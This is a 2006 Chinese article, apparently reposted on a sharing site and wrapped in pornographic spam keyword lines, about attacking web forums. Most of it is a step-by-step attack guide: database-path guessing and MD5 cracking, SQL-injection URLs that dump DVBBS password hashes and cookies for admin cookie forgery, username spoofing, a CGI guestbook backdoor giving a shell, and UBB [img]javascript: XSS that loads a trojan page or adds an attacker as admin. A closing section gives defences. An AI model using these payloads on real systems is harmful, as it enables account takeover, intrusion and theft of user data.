欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP
黑客入侵論壇各種手段大暴光
[日期:2006-05-29] 來(lái)源:  作者: [字體: ]

黑客入侵論壇各種手段大暴光

目前網(wǎng)上有種新的趨勢,黑客們的攻擊目標開(kāi)始從網(wǎng)站延伸到論壇和聊天室及留言板等公共場(chǎng)所,而許多用戶(hù)的論壇密碼竟然與E-mailQQ的密碼完全相同,因此對大家的網(wǎng)絡(luò )安全威脅非常大。換個(gè)角度來(lái)說(shuō),黑客們通過(guò)入侵這些地方,可以得到更高的權限。比如通過(guò)80端口進(jìn)行滲透入侵,甚至于還可以得到論壇和聊天室、留言板等服務(wù)主機的最高權限,是不是很可怕?許多人以為只有黑客高手才能做到這一點(diǎn),其實(shí)不然,只要簡(jiǎn)單的幾步,連菜鳥(niǎo)都能得到論壇或聊天室及留言板的一切!本文將以常見(jiàn)的論壇為例,談?wù)勚饕恼搲舴椒ê头婪妒侄巍?

針對論壇的攻擊手段

第一招:霸王硬上弓破解論壇數據庫

目前很多國內論壇都采用了動(dòng)網(wǎng)先鋒引擎(一款由ASPSKY.NET開(kāi)發(fā)和維護的asp論壇引擎)。要想控制整個(gè)論壇就得有管理員密碼,怎樣才能得到動(dòng)網(wǎng)論壇的管理員密碼呢?黑客常用的招數之一是先獲得動(dòng)網(wǎng)論壇的數據庫文件,然后再破解數據庫中的管理員密碼,不過(guò)該數據庫文件中的密碼是用MD5加密的,所以要使用工具軟件進(jìn)行破解。舉個(gè)例子,黑客會(huì )可以先猜一下數據庫文件存放在哪個(gè)目錄里,如果猜對的話(huà)下載數據庫的成功率就比較高了。一般說(shuō)來(lái),管理員都有個(gè)習慣,就是給數據庫文件存放的目錄起個(gè)好記的名字,如data、database、bd、mdb等。所以黑客們可以在瀏覽器中輸入:http://www.target.com/databasehttp://www.target.com/mdb或者是http://www.target.com/db試試,如果顯示“HTTP錯誤404-找不到文件”,說(shuō)明對方?jīng)]有這個(gè)目錄,再換一個(gè)目錄名試試,假設你輸入http://www.target.com/data,顯示“HTTP錯誤403-禁止訪(fǎng)問(wèn)”,則說(shuō)明對方有這個(gè)目錄,但是不允許我們?yōu)g覽該目錄,這樣就有希望了!

下一步只要有辦法找到數據庫文件并下載下來(lái)就有希望得到對方的管理員密碼。比方說(shuō),黑客可以使用漏洞掃描器X-SCAN掃描目標,看是否有漏洞,如果目標做了端口過(guò)濾,只開(kāi)了80端口,我們可以這樣試試:把一些常用的數據庫地址如data.mdb、db.mdb、database.asp等添加到X-ScanCGI數據庫中,或者用一些黑客字典來(lái)生成數據庫地址,然后單獨作一個(gè)數據庫,把它添加到X-ScanCGI數據庫中。然后只掃描CGI漏洞,過(guò)一段時(shí)間掃描完畢,假設顯示的掃描結果為“/data/database.asp”,就表示我們成功地掃描到了數據庫文件?,F在用下載工具把數據庫下載下來(lái)即可,然后把文件擴展名改為.mdb。接下來(lái)就可以使用MD5的暴力破解程序和字典解出密碼。不要小瞧了這個(gè)辦法,許多人就是這樣破解了你的論壇管理員密碼!

第二招:溫柔一刀成為論壇管理員

仍舊以動(dòng)網(wǎng)先鋒論壇為例。最近該論壇出現一個(gè)漏洞,使得普通用戶(hù)可以輕松地獲得論壇中任意用戶(hù)的密碼,包括管理員在內!由于其#asp文件沒(méi)有過(guò)濾用戶(hù)提交SQL查詢(xún)的輸入,導致遠程攻擊者可以利用這個(gè)漏洞進(jìn)行SQL攻擊,進(jìn)而威脅論壇或服務(wù)器安全。注意,該手段對DVBBS VER 6.0.06.0.0 SP1、SP2都有效,對低版本的動(dòng)網(wǎng)論壇也有效,而且無(wú)論數據庫是ACCESS還是MS SQL都通吃。

 

 



   
攻擊方法為:找到你的目標論壇,然后輸入其網(wǎng)址,假設為http://www.target.com/asp/dvbbs/index.asp,然后查詢(xún)管理員的名字,每個(gè)論壇中都有這樣的人,記住該人的論壇ID。接著(zhù)在瀏覽器地址欄中輸入:http://www.target.com/dvbbs/#asp?orders=2&N=10,注意“N=”后面你可以隨意寫(xiě)上任何數字,它表示你想查詢(xún)幾個(gè)論壇用戶(hù),回車(chē)即可看到該論壇的用戶(hù)名(如圖1)??吹狡渲械墓芾韱T的名字了嗎?OK,接下來(lái)在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userclass,”,這樣就會(huì )查到這些人在論壇中的身份(如圖2),注意其中的管理員身份的人,他具有最高權限,黑客的目標就是他。下一步,請在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userid,”,回車(chē)后在你看到的窗口中(如圖3)記住管理員的ID在論壇中是第幾位注冊用戶(hù),假設為1。再下一步,在地址欄中輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20userpassword,”,這樣你就會(huì )看到論壇中用戶(hù)的密碼(如圖4),可惜是經(jīng)過(guò)MD5加密處理的,但這已經(jīng)足夠了。最后再輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20usercookies,”,回車(chē)后在出現的窗口中(如圖5)記下管理員的usercookies的值,一般為0。好了,到現在黑客就得到管理員的Cookies的內容了,他可以通過(guò)在本機中偽造管理員的Cookies來(lái)入侵論壇。如果你輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20quesion,”,還可以得到論壇中用戶(hù)忘記密碼時(shí)的密碼提示問(wèn)題,輸入“http://www.target.com/dvbbs/#asp?orders=2&N=10%20answer,”可以得到他的問(wèn)題答案(也是MD5加密的)!



   
接下來(lái)在該論壇新注冊一個(gè)新用戶(hù),然后用Cookies管理軟件(如iecv)改造自己在該論壇的Cookies。其實(shí),這一步的目的就是通過(guò)Cookies來(lái)讓論壇以為你就是管理員,因為論壇判定是否是管理員的主要方法就是通過(guò)論壇ID和密碼來(lái)實(shí)現的,而Cookies中記錄的正是論壇ID和密碼,當然這個(gè)密碼是加密存放在Cookies中的。



   
運行Cookies管理軟件iecv,選擇“View”菜單下的“Obsolete cookie file”,就可以看到你的電腦中的Cookies文件了。由于你是新注冊的論壇ID,所以在iecv的主界面的最開(kāi)頭就可以看到該論壇的Cookies文件,在它前面打上“√”,然后右鍵單擊界面中央的aspsky,選擇彈出菜單中的“編輯Cookie的內容”(圖6),然后就可以編輯你的Cookies內容了,把里面的內容替換為你剛剛查到的內容即可。最后關(guān)閉該軟件,并關(guān)閉瀏覽器,重新輸入該論壇的地址,進(jìn)入后黑客就會(huì )成為該論壇的管理員了!此時(shí)這個(gè)論壇就在黑客的掌握之中了,干什么都可以隨心所欲了!

 

第三招:魚(yú)目混珠冒名發(fā)言

   
舉個(gè)例子,黑客可以在打開(kāi)記事本后按下tab鍵或CapsLock+Tab鍵,這樣就會(huì )形成一個(gè)特殊的空格。復制該空格,用他想冒名發(fā)言的用戶(hù)名加上該空格注冊一個(gè)新用戶(hù),這樣就會(huì )成功注冊一個(gè)和對方一樣的名字,接下來(lái)就可以冒名發(fā)言了,稍不留意別人就會(huì )上當。形成特殊空格還可以采用區位輸入法輸入aaaaaaabaaac。另外在html標簽里還可以使用 ( 就是顯示空白內容的意思)制造一個(gè)特殊的空格。用區位輸入法輸入的aaaa/aaab/aaacASP編寫(xiě)的程序里冒名的成功率極高,而tab鍵和 制造的特殊空格在php程序里成功率更高些。更可怕的是,在wdb論壇和ibb論壇,用Tab鍵構造的特殊用戶(hù)名可以取得和原用戶(hù)相同的權限。如果原用戶(hù)名是管理員,那黑客構造的這個(gè)冒名用戶(hù)也會(huì )變成管理員!

    第四招:暗渡陳倉形成網(wǎng)頁(yè)后門(mén)

   
大家知道,在cgiperl程序里如果寫(xiě)入“system @ARGV;#”(注意輸入時(shí)沒(méi)有引號),就會(huì )形成一個(gè)有趣的網(wǎng)頁(yè)后門(mén)。在IE地址欄中輸入http://ip/*.pl?dir就會(huì )看到網(wǎng)站的物理目錄。以網(wǎng)上非常流行的Agbii免費cgi留言本為例,該留言本里的留言是以第n條留言的數目、用戶(hù)名、標題和內容等等來(lái)排列的,而且留言都是按照順序排放在一個(gè)固定目錄data/用戶(hù)名下面的。說(shuō)起來(lái)好像很復雜,讓我們來(lái)看圖7,假設這是黑客在Agbii免費cgi留言本中的留言,它是該留言本中的第14條留言,假設其注冊的用戶(hù)名是;system,標題為@ARGV;#,內容則是“呵呵”,在data/222目錄下的14.pl的文件內容就是如圖8所示。由于此留言本的用戶(hù)就是222,因此只要黑客在瀏覽器地址欄中輸入http://IP/book/data/222/14.pl?dir就會(huì )得到一個(gè)shell了(圖9)。注意這里的http://IP/book/是留言本的地址。得到shell之后,黑客還可以得到該管理員的密碼!只要在瀏覽器的地址欄中輸入“http://IP/book/data/管理員名字/14.pl?type+該留言本的物理目錄\user\管理員名字.cgi”就可以了。以本文為例,只要輸入“http://www.xxx.com/book/data/lxgyp/14.pl?type+d:\虛擬主機\web\book\user\lxgyp.cgi”就可以得到該管理員的用戶(hù)名和密碼、注冊時(shí)的郵件地址、他的網(wǎng)站地址、IP地址以及登陸時(shí)間,一目了然,盡在掌握!



 



 

 

 第五招:太公釣魚(yú)進(jìn)行跨站腳本攻擊

   
還有一種比較有趣也比較難利用的方法,其實(shí)就是所謂的跨站腳本攻擊。先說(shuō)一個(gè)有趣的現象,在論壇中流行的UBB代碼中有一個(gè)bug,[img][/img]這對標簽是UBB代碼中經(jīng)常會(huì )用到的,用來(lái)引用一個(gè)圖片。在[img][/img]中如果插入的不是圖像而是javascript腳本它同樣會(huì )執行!舉個(gè)例子,如假設你在某論壇中所發(fā)帖子內容為:[img]javascript:alert("黑客")[/img],當有人點(diǎn)擊這個(gè)貼子就會(huì )彈出一個(gè)對話(huà)框。

   
如果把上面的內容換為:[img]javascript:alert("黑客");self.open("http://url")[/img],則點(diǎn)擊后不僅會(huì )彈出一個(gè)對話(huà)框,而且還會(huì )打開(kāi)一個(gè)新的網(wǎng)頁(yè)窗口。如果黑客在這個(gè)網(wǎng)頁(yè)里放入網(wǎng)頁(yè)木馬會(huì )怎么樣呢?答案是你會(huì )中木馬!不僅如此,利用這個(gè)辦法還可以使論壇中沒(méi)有任何權限的用戶(hù)提升為管理員!假設某論壇加新管理員hackerurlhttp://ip/bbs/upadmin?user=hacker,由于這個(gè)url只有以管理員身份執行才可以成功,所以你直接在地址欄中輸入是沒(méi)有任何用處的。但是利用剛剛提到的跨站腳本攻擊,只要黑客先注冊一個(gè)名為hacker的用戶(hù),然后新建一個(gè)帖子,在里面寫(xiě)入:[img]javascript:alert("黑客");self.open("http://ip/bbs/upadmin?user=hacker")[/img],然后給這個(gè)帖子起個(gè)醒目的主題,如“管理員論壇好像有大漏洞”,來(lái)引誘該論壇的管理員來(lái)查看此貼,當管理員點(diǎn)擊此貼后,hacker這個(gè)用戶(hù)就會(huì )提升為該論壇的管理員!同樣的道理,黑客還可以上傳一個(gè)txt附件,txt文件里就是那個(gè)加hacker管理員的url,由于IE瀏覽器存在一個(gè)問(wèn)題,即只要文件里面含有html代碼就會(huì )執行(IE才不理會(huì )后綴名是什么呢),所以論壇管理員只要點(diǎn)此txt附件,就會(huì )在論壇中增加一個(gè)名為hacker的管理員。如果對[img][/img]之間或txt附件里面的代碼進(jìn)行精心偽造,黑客還可以讓論壇管理員在點(diǎn)擊帖子或txt附件后毫無(wú)察覺(jué),所以很難防范。 

 之所以會(huì )出現論壇或留言板等遭受攻擊,關(guān)鍵是由于有漏洞存在,只要將這些漏洞堵上就沒(méi)有問(wèn)題了。但是許多漏洞的存在是由于論壇或留言板編程時(shí)作者的疏漏所致,作為使用者是較難防范的,我們只能寄希望于作者早日解決這些問(wèn)題。從這個(gè)角度來(lái)說(shuō),論壇管理員經(jīng)常給自己的論壇打補丁是必不可少的。應該經(jīng)常留心各大黑客組織發(fā)布的漏洞公告,及時(shí)發(fā)現自己的論壇所存在的問(wèn)題。再有,要嚴格過(guò)濾特殊字符,防止有人利用特殊字符進(jìn)行攻擊。無(wú)論是管理員還是論壇中的普通用戶(hù),都建議您能設置一個(gè)強壯的密碼,并定期更換,以防止別人暴力破解你的密碼。

   
針對論壇數據庫被人下載下來(lái)然后破解的問(wèn)題,建議管理員能將論壇的數據庫文件改成一個(gè)沒(méi)有規律的復雜名字,并將擴展名由mdb改為asa,如3sdal9eklz9c0ad.asa,3sdal9eklz9c0ad.inc等,有點(diǎn)像用MD5加密過(guò),對吧?同時(shí)還要將該文件放到深層目錄中,這樣在一定程度上可以減少被人下載的危險。

   
將數據庫database.mdb改成#database.mdb,這是最簡(jiǎn)單有效的辦法。我們來(lái)解釋一下這樣做的好處:假設別人得到你的數據庫地址串將是:http://www.yourserver.com/yourfolder/#database.mdb,但實(shí)際上他得到是:http://www.yourserver.com/yourfolder/,因為#在這里起到間斷符的作用,地址串遇到#號,自動(dòng)認為訪(fǎng)問(wèn)地址串結束。注意不要設置目錄可訪(fǎng)問(wèn),用這種方法,不管別人用何種工具都無(wú)法下載。注:只要數據庫文件名任何地方含有‘#‘,別人都無(wú)法正常下載。同理,空格號也可以起到‘#‘號作用,但必須是文件名中間出現空格。

   
另外,還要使用Access軟件來(lái)為數據庫文件編碼及加密。首先選取 “工具→安全→加密/解密數據庫”,選取數據庫文件然后確定,接著(zhù)會(huì )出現“數據庫加密后另存為”的窗口,確定后文件就會(huì )被編碼加密。以上的操作并不是對數據庫設置密碼,而只是對數據庫文件加以編碼,目的是為了防止他人使用別的工具來(lái)查看數據庫文件的內容。接下來(lái)還可以為數據庫設置訪(fǎng)問(wèn)密碼。首先打開(kāi)經(jīng)過(guò)編碼的庫文件,在打開(kāi)時(shí),選擇“獨占”方式。然后選取功能表的“工具→安全→設置數據庫密碼”,接著(zhù)輸入密碼即可。這樣即使他人得到了這個(gè)文件,沒(méi)有密碼也是無(wú)法看到內容的。這樣就算黑客知道Access數據庫的名字也無(wú)法輕易下載,這種方法通常在租用別人服務(wù)器時(shí)使用。最后,建議您在IIS中把數據庫所在的目錄設為不可讀,這樣就可以防止文件被人下載了!

   
對于普通用戶(hù)而言,建議大家不要在論壇中留下真實(shí)的聯(lián)絡(luò )方式,如E-mailQQ等,如果非要留下不可,論壇中你的密碼一定不要和其他密碼相同,免得被人順藤摸瓜,得到你的全部秘密!

本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
誰(shuí)來(lái)保障我們的賬號安全?
女子遭遇厲害蹭網(wǎng)族 七成用戶(hù)忽視管理員密碼
悟空問(wèn)答
五分鐘搭建Web服務(wù)器和論壇
服務(wù)器防滲透之信息收集
校園網(wǎng)信息安全及防范策略
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久